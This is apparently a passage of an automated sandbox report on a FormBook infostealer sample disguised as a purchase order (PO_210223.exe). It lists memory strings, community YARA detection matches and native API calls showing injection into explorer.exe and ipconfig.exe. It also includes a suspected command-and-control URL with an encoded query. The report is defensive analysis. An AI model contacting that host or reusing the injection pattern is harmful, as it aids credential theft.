            Source: PO_210223.exe, 00000000.00000003.655856986.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: PO_210223.exe, 00000000.00000003.658733903.0000000008285000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com8i
            Source: PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comal
            Source: PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comh
            Source: PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cniy
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: PO_210223.exe, 00000000.00000002.679711505.0000000001030000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: PO_210223.exe
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00419D50 NtCreateFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00419E00 NtReadFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00419E80 NtClose,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00419D4A NtCreateFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00419F2A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018499A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018498F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018495D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018497A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018496E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018499D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018498A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849A10 NtQuerySection,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018495F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849560 NtWriteFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849760 NtOpenProcess,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184A770 NtOpenThread,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018496D0 NtCreateKey,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01849670 NtQueryInformationProcess,
            Source: C:\Windows\explorer.exeCode function: 10_2_04E0DA32 NtCreateFile,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034996D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034996E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034995D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034999A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0349A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0349A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034997A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0349A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499650 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499660 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499560 NtWriteFile,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0349AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034999D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034995F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0349B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03499820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034998F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034998A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009C9D50 NtCreateFile,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009C9E80 NtClose,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009C9E00 NtReadFile,
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009C9D4A NtCreateFile,
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_012821F8
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_012830D0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01281851
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01280FF8
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_012851E0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_012851D0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01283063
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01281292
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01285420
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01285430
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_012804D0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_012856A8
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01285698
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01285840
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01283FA8
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01283F99
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01280FD4
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_01284E60
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_09AB9DD0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_09AB6100
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_09ABB098
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 0_2_09AB0040
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00401026
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00401030
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041D3FD
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00402D90
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041E601
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00409E30
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0041DFA7
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_00402FB0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180F900
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01824120
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181B090
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D20A8
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D28EC
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1002
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183EBB0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CDBD2
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D2B28
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D22AE
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D25DD
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181D5E0
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D2D07
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01800D20
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D1D55
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181841F
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CD466
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D1FF1
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D2EF7
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CD616
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01826E30
            Source: C:\Windows\explorer.exeCode function: 10_2_04E0DA32
            Source: C:\Windows\explorer.exeCode function: 10_2_04E05CEC
            Source: C:\Windows\explorer.exeCode function: 10_2_04E05CF2
            Source: C:\Windows\explorer.exeCode function: 10_2_04E0C862
            Source: C:\Windows\explorer.exeCode function: 10_2_04E04069
            Source: C:\Windows\explorer.exeCode function: 10_2_04E10A6F
            Source: C:\Windows\explorer.exeCode function: 10_2_04E04072
            Source: C:\Windows\explorer.exeCode function: 10_2_04E08B22
            Source: C:\Windows\explorer.exeCode function: 10_2_04E0B132
            Source: C:\Windows\explorer.exeCode function: 10_2_04E10B0E
            Source: C:\Windows\explorer.exeCode function: 10_2_04E08B1F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03522B28
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03521FF1
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348EBB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03476E30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03522EF7
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_035222AE
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03521D55
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345F900
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03522D07
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03450D20
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03474120
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346D5E0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482581
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03511002
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346841F
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346B090
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034820A0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_035220A8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009B2D90
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CE601
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009B9E30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009B2FB0
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_009CDFA7
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: String function: 0180B150 appears 35 times
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0345B150 appears 35 times
            Source: PO_210223.exeBinary or memory string: OriginalFilename vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000000.641235536.0000000000956000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.689224282.000000000B660000.00000002.00000001.sdmpBinary or memory string: originalfilename vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.689224282.000000000B660000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.687139133.0000000009840000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.687388801.00000000099C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.688279597.000000000B570000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: k,\\StringFileInfo\\000004B0\\OriginalFilename vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs PO_210223.exe
            Source: PO_210223.exe, 00000000.00000002.679711505.0000000001030000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_210223.exe
            Source: PO_210223.exe, 00000009.00000002.715919446.00000000016E7000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs PO_210223.exe
            Source: PO_210223.exe, 00000009.00000000.673088328.0000000000CF6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
            Source: PO_210223.exe, 00000009.00000002.716615748.0000000001A8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_210223.exe
            Source: PO_210223.exeBinary or memory string: OriginalFilenameUCOMITypeComp.exe6 vs PO_210223.exe
            Source: PO_210223.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
